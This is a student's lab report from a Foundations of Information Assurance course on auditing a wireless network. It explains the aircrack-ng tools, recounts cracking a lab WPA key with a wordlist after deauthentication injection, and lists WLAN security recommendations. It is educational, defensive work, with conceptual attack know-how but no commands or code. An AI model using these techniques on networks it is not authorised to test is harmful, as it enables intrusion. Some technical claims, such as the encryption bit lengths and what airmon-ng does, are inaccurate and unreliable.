2. Contents
Lab #18: Auditing a Wireless Network and Planning for a Secure WLAN Implementation .......2
a. Assessment Sheet........................................................................................................................2
c. Screenshots: ................................................................................................................................4
3. Lab #18: Auditing a Wireless Network and Planning for a Secure
WLAN Implementation
a. Assessment Sheet
Course Name and Number: Foundations of Information Assurance – IA5010
Student Name: <Carmen Alcivar>
Instructor Name: Derek Brodeur
Lab Due Date: <3/20/16>
Lab Assessment Questions & Answers
1. What functions do these WLAN applications and tools perform on WLANs: airmon-ng,
airodumpng, aircrack-ng, and aireplay-ng?
The airmon-ng tool is used to enable the monitor mode on wireless LAN
interfaces. It may also be used to toggle between the monitor mode and the
managed mode. Entering the airmon-ng command without parameters will show
the interface's status on the WLAN.
The airodump-ng tool is used for packet capturing of raw 802.11 frames and is
particularly suitable for collecting WEP initialization vectors with the intent of
using them with aircrack-ng.
The aireplay-ng tool is used to inject frames. The primary function of this
injection is to generate traffic that aircrack-ng will use later for cracking the WEP
and WPA-PSK keys. There are different attacks that can cause de-authentications
for capturing WPA handshake data, fake authentications, interactive packet
replay, handcrafted ARP request injection, and ARP-request reinjection
The aircrack-ng tool is an 802.11 WEP and WPA-PSK keys cracking program
that can recover keys once enough data packets have been captured.
2. Why is it critical to use encryption techniques on a wireless LAN? Which
encryption method is best for use on a WLAN (WEP, WPA, WPA2)?
WPA2 is best. It is critical to use encryption techniques on wireless LAN because
that information can be easily found by hackers.
3. What security countermeasures can you enable on your wireless access point
(WAP) as part of a layered security solution for WLAN implementations?
Enabling MAC address filtering on the WAPs. These addresses can be spoofed.
Disabling SSID broadcast. The SSID can still be found through other means.
Limiting the amount of available IP host addresses on the WLAN DHCP server
to prevent unauthorized DHCP leases.
Enabling WPA2 to maximize encryption and ensure data transmission
confidentiality. WPA2-Enterprise utilizes additional IT infrastructure such as a
RADIUS server that helps authenticate and secure against unauthorized access.
Utilizing hashing for data transmissions and emails through WLANs to ensure
data integrity.
4. 4. Why is it so important for organizations, including homeowners, to properly
secure their wireless network?
It is important to protect wireless networks to avoid improper and unauthorized
access to their networks.
5. What risks, threats, and vulnerabilities are prominent with WLAN
infrastructures?
With the advent of wireless connections, more risks, threats and vulnerabilities
have emerged. In the case of WLAN infrastructures, among the risks, threats and
vulnerabilities we can cite:
- An employee could plug in a wireless access point to the network jack at
his or her desk and allow an unauthorized user to access the network and,
possibly, unauthorized systems.
- Some WLANs are implemented with no encryption, while others use only
WEP (Wired Equivalent Privacy) which uses only a weak 40-bits of
encryption.
- Users frequently share passwords to allow others access to the WLAN.
- Most users unknowingly broadcast their SSID (Service Set Identifier)
information, their network's name, in clear text. Without the use of VPN or
encryption technology, this information is easily captured by readily-
available scanners.
6. What is the risk of logging onto access points in airports or other public
places?
An attacker can enable a rogue wireless access point to capture credentials and
other data while an unsuspecting user connects to the Internet using a free WLAN
connection
7. Why is it important to have a wireless access policy and to conduct regular
site surveys and audits?
It is important to have a wireless access policy and to conduct regular site surveys
and audits. Improperly configured WLANs can provide unrestricted access to an
organization's entire network environment.
8. What is a risk of using your mobile cell phone or external WLAN as a WiFi
connection point?
Using the mobile cell phone or external WLAN as a WiFi connection point poses
great risks because it could allow others to bypass internal corporate security
solutions, if those have not been properly set up.
b. Challenge Question
As a field representative for your company, you are used to traveling and working from
hotels on the road. You always stay in a hotel with free WiFi so that you work and check
your email, as well as Skype with your family. What are the risks of using a public WiFi?
Using public WiFi poses high risks to organizations or even individuals, because it is an open
door for hackers to bypass to internal corporate security solutions.
5. Short of finding a more secure network, what could you do to use this wireless network in a
more secure fashion? What options do you have if you are traveling for personal reasons, and
not as an employee?
The same security measures apply to individuals when traveling for personal reasons as they
would like to protect their personal information. Try not to use those that are for free and
check on the security specifications.
c. Screenshots:
Part 3:
[Deliverable Lab Step 4]: screen shot displaying the key found
It took 06 min and 23 secs to find the key “darkobsidian” an 128728 keys were tested.
WLAN security implementation plan (Draft)
a. Summary of findings from the lab
The computer with IP address 172.30.0.19 was accessed due to a vulnerability exploited
based on the lack of use of encryptions as a measure of security on WLAN, log in
information was showing in clear text. The intruder used the Aircrack-ng suite to capture and
manipulate network information.
Airmon –ng was used to create a directory that stored information captured. It was done without
being authenticated, the mon0 directory was created to monitor all wireless traffic and found weak
point that was used to carry out the attack. This process overpassed any type of authentication in
the network.
6. Aircrack-ng tool was used to capture network information which was displayed in clear text
as can be seen in screen below. The item with number 18 was used to carry the attack.
Then the attacker run a DoS attack by using the tool airplay –ng, first injected 5 packages and
then 10 more, this totaled 15 which in overall caused a DoS attack. This way the
administrator was forced to re-authenticate, since the attacker was in, then it was easier to the
attacker to obtain credentials.
b. Critical risks, threats, and vulnerabilities on the WLAN
The fact that the WLAN information was not encrypted posed a high level of risk and
vulnerability to the threat of intercepting passwords and network information.
The Silentvalor WLAN network was identified for the attack. It displayed in clear text.
Then the attacker used the Aircrack-ng command and ran the wordlist dictionary file
against the captured file in order to crack the WPA key. This process took just few
minutes to find the key.
7. Once the key was found, it was easy to access to the WLAN.
c. Assessment of the overall security of this WLAN
This WLAN was vulnerable to exploitation due to lack of encryption of WLAN key and
password information. Log in information was been displayed in clear text.
d. Security recommendations
Use of encryption on wireless LAN for all the data payload within IP packets,
including logons, passwords, and privacy data because otherwise they will show in
clear text to intruders. As demonstrated above, protocol capturing tools such as the
Aircrack-ng suite have the capability to capture IP packets from unsecured WLANs and
can compromise systems by stealing logons and passwords along with privacy data
elements.
There are three encryption methods are available for use on a WLAN and each of them
have different levels of strength depending on the bits of encryption:
1. WEP (Wired Equivalent Privacy) - 40-bits of encryption.
2. WPA (WiFi Protected Access) - 128-bits of encryption, subset of IEEE 802.11i.
3. WPA2 (WiFi Protected Access 2) - 256-bits of encryption, full implementation of
IEEE 802.11i. Though vulnerable, this is the best encryption method for use on a
WLAN.
Also according to the NIST attack monitoring and vulnerability monitoring are also
needed (Guidelines for Securing Wireless Local Area Networks.
http://csrc.nist.gov/publications/drafts/800-153/Draft-SP800-153.pdf)
8. SANS recommends stronger user authentication such as user’s ID’s and passwords,
smart cards and security token, this will prevent access to unauthorized parties to
private networks.